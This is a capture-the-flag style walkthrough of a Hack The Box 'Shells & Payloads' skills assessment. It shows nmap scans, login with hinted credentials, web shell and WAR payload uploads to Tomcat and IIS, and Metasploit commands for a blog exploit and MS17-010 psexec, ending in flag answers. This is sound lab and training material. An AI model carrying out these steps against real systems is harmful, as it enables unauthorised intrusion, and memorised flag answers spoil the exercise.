Shells & Payloads - The Live Engagement

First thing to do is connect to Foothold using Xfreerdp

xfreerdp3 /v:ipaddress /u:username /p:password

You will then be connected to the foothold host

IFCONFIG

┌─[htb-student@skills-foothold]─[~]
└──╼ $ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:75:cb:8f:86  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.204.126  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 dead:beef::250:56ff:feb0:3448  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb0:3448  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b0:34:48  txqueuelen 1000  (Ethernet)
        RX packets 15871  bytes 1285837 (1.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9521  bytes 12710293 (12.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.1.5  netmask 255.255.254.0  broadcast 172.16.1.255
        inet6 fe80::250:56ff:feb0:e56  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b0:0e:56  txqueuelen 1000  (Ethernet)
        RX packets 3072  bytes 436727 (426.4 KiB)
        RX errors 0  dropped 10  overruns 0  frame 0
        TX packets 3054  bytes 219110 (213.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 42  bytes 3104 (3.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 42  bytes 3104 (3.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌─[htb-student@skills-foothold]─[~]

Now we need to begin targetting Host-01

Run an initial nmap scan for the first question to get a brief of whats going on on the host

┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap -A 172.16.1.11
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-12 12:01 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.044s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
515/tcp  open  printer       Microsoft lpd
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SHELLS-WINSVR
|   NetBIOS_Domain_Name: SHELLS-WINSVR
|   NetBIOS_Computer_Name: SHELLS-WINSVR
|   DNS_Domain_Name: shells-winsvr
|   DNS_Computer_Name: shells-winsvr
|   Product_Version: 10.0.17763
|_  System_Time: 2025-04-12T16:02:53+00:00
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2025-04-11T15:42:55
|_Not valid after:  2025-10-11T15:42:55
|_ssl-date: 2025-04-12T16:02:58+00:00; 0s from scanner time.
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: shells-winsvr
|   NetBIOS computer name: SHELLS-WINSVR\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-12T09:02:53-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:4e:ae (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-04-12T16:02:53
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.78 seconds

• The host name is: shells-winsvr

• This is a Windows Server 2019

Lets begin with some recon on the target

We shall visit the web server first and see whats going on there if there is any upload exploits that can be exploited.

1. Checked if Firefox was installed because I was not seeing an installation application

2. Then launched web server

Seems to be an Apache Tomcat/10.0.11 Webserver running

Lets look for some exploits for this version.

So far seems to be none that could provide us with an initial access

Next i've identified something that looks pretty promising

• The Manager Web_App for Tomcat it seems

• It also shows where the users are defined

When I click on the manaegr_webapp, it does bring me to someone of access authentication page, but the thing is we don't know the password yet

I took the shortcut method and checked for the Hint for Host-01.

• We got told that there are two vulnerabilities

• The creds for potentially vulnerable process is tomcat | Tomcatadm

I will revisit how to get the credentials later

I tested this in the above Manager page that I identified previously and the credentials worked

Now Lets explore this page

1. Got some nice info about the server

1. We have some sort of Upload feature here

Now, based on the above upload feature, what exactly is a WAR file? quick GPT search and we get

• So we will need a WAR Payload to upload to the Tomcat Server

But what tool can do this?

1. Lets check out Laudanum

• Quick search on my own VM and we can identify that there is a cmd.war payload

1. Lets try it on the Remote Host

   1. Boom! the Remote host also has the same thing

1. Lets copy this file to a better location

1. Lets try and upload this f***** payload

   1. Go back to the browser and try upload it

• Press Deploy and see what happens?

1. We see that a new application was added, so i guess the upload worked?

1. Lets try and browse to his directory now

   1. Seems like this payload method doesn't work

   2. We could try another method of creating a payload

   3. Lets try with MSFVenom

PAYLOAD WITH MSFVENOM

1. Setup a listener on the Attacker machine

   1. This will listen on port 8081 for any connections to that port

1. Setup MSFVENOM Payload

   1. Set the IP Address and the PORT

   2. Set the type of payload

1. We will use this payload and try upload it through the tomcat manager platform again and see if we get a shell

I tried it and realized it doesnt work, but the issue is that the payload type i set it to windows, where the platform is a apache webserver which uses JavaScript, so my bad, will change the payload type and hopefully it works this time.

BOOM, now it works, we have a shell

So we are done with HOST-01, lets move onto the next

---

HOST-02

Enum

Nmap Scan

┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap blog.inlanefreight.local -A
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 02:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
|   256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_  256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds

• So we know that it is an Ubuntu machine that is running

• There is SSH

  • We can try to access it later

• There is a HTTP Webserver running

  • We see robots.txt > Something we can explore for hidden directories

Have you taken the time to validate the scan results? Did you browse to the webpage being hosted? blog.inlanefreight.local looks like a nice space for team members to chat. If you need the credentials for the blog, " admin:admin123!@# " have been given out to all members to edit their posts. At least, that's what our recon showed. 

Checking out the Webserver

Seems to be a guy named Slade Wilson posting some post on the blog website

The question in HTB ask something similar to the blog post by Slade Wilson

Lets check out the post maybe we can identify an answer

The answer is: php

• Basically look at the link of the exploit and read through the code and you will see the following

Now to exploit this blog website, i guess we will have to identify a way to upload this exploit, so lets have a look back at the blog.

Seems to be a login for the user Slade Wilson.. ummm interesting..

I wounder what the credentials could be....

If we check the Hints for Host-2 we get some sort of credentials for the blog, lets try and use that

admin:admin123!@#

We gain access as Slade Wilson, nice!

We can now create some blog post as Slade Wilson

Exploitation - With Metasploit

To exploit this we can use Metasploit which should have the exploit module identified by Slade Wilson.

Lets try

msfconsole -q

msf](Jobs:0 Agents:0) >> use 50064.rb
[*] Using configured payload php/meterpreter/bind_tcp
[msf](Jobs:0 Agents:0) exploit(50064) >> show options

Module options (exploit/50064):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   demo             yes       Blog password
   Proxies                     no        A proxy chain of format type:host:por
                                         t[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identi
                                         fier, or hosts file with syntax 'file
                                         :<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connec
                                         tions
   TARGETURI  /                yes       The URI of the arkei gate
   USERNAME   demo             yes       Blog username
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/bind_tcp):

Now we set the options required

set VHOST blog.inlanefreight.local

We need to identify the IP Address of the Blog Web Server

└──╼ $ping -c 1000 blog.inlanefreight.local
PING blog.inlanefreight.local (172.16.1.12) 56(84) bytes of data.
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=1 ttl=64 time=0.423 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=2 ttl=64 time=0.481 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=3 ttl=64 time=0.612 ms
^C
--- blog.inlanefreight.local ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2055ms
rtt min/avg/max/mdev = 0.423/0.505/0.612/0.079 ms

Now we set the remaining options

[msf](Jobs:0 Agents:0) exploit(50064) >> set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOSTS 172.16.1.12
RHOSTS => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOST 172.16.1.12
RHOST => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set USERNAME admin
USERNAME => admin
[msf](Jobs:0 Agents:0) exploit(50064) >> set PASSWORD admin123!@#
PASSWORD => admin123!@#

Now lets exploit this shit... and BOOM we are in!!

HTB ANSWER: B1nD_Shells_r_cool

HOST-03

Enum

nmap scan

┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #nmap -A 172.16.1.13
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 12:04 EDT
Nmap scan report for 172.16.1.13
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
MAC Address: 00:50:56:B0:6C:CC (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:6c:cc (VMware)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: SHELLS-WINBLUE
|   NetBIOS computer name: SHELLS-WINBLUE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-13T09:05:19-07:00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-04-13T16:05:19
|_  start_date: 2025-04-13T15:06:06

TRACEROUTE
HOP RTT     ADDRESS
1   3.43 ms 172.16.1.13

Enumerating Webserver

When we visit the website, we see its just a directory listing

We see that there is an upload.aspx used for uploading aspx files, so in this case we can create an aspx payload utilizing various methods to gain a shell

Exploit

1. Lets try with 🧪 Laudanum – "One Web Shell to Rule Them All"

2. Locate Laudanum and find the right shell payload

1. We can copy this payload to our own directory

┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #cd /usr/share/laudanum/aspx/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #ls
shell.aspx
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cp shell.aspx /home/htb-student/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cd /home/htb-student/
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #ls
ls: cannot access 'thinclient_drives': Permission denied
core     Documents  Music     Public      Templates          Videos
Desktop  Downloads  Pictures  shell.aspx  thinclient_drives
┌─[✗]─[root@skills-foothold]─[/home/htb-student]
└──╼ #

1. Now lets change some settings, most likely the allowed IPs, lets see

   1. Ive added the foothold's IP Address

1. Now lets try and uplaod this payload and see if we can get a shell

IT WORKED!!!!

ummmmm... Its seems that access is denied when trying to change directory into the Administrator account

I did look at the hint, it mentioned Blue, so this means that his host is vulnerable to Eternal Blue.. I went into a loophole through the webserver, but still at least we got a shell through their, we woulc have maybe done it another way..

Lets test the Eternal Blue Method

┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #msfconsole -q

Search the exploit

[msf](Jobs:0 Agents:0) >> search ms17

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank     Check  Description
   -   ----                                                   ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1   exploit/windows/smb/ms17_010_psexec

We will use the 1 options, psexec payload

Set the other options

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set RHOSTS 172.16.1.13
RHOSTS => 172.16.1.13
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set LHOST 172.16.1.5
LHOST => 172.16.1.5
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >>

Now we can spray and pray!

BOOM WE GOT A GOOD SHELL

To answer the Final HTB Question

(Meterpreter 1)(C:\Windows\system32) > cat C:/Users/Administrator/Desktop/Skills-flag.txt
One-H0st-Down!(Meterpreter 1)(C:\Windows\system32) >